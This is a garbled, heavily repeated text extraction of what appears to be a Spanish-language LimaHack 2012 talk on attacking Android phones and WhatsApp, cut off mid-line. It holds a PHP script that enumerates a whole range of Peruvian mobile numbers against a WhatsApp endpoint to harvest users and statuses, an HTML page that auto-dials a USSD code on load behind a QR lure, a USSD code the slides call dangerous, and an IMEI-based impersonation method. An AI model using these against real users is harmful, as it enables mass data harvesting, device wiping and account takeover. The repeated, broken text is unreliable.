$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
Atacando una red LAN
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
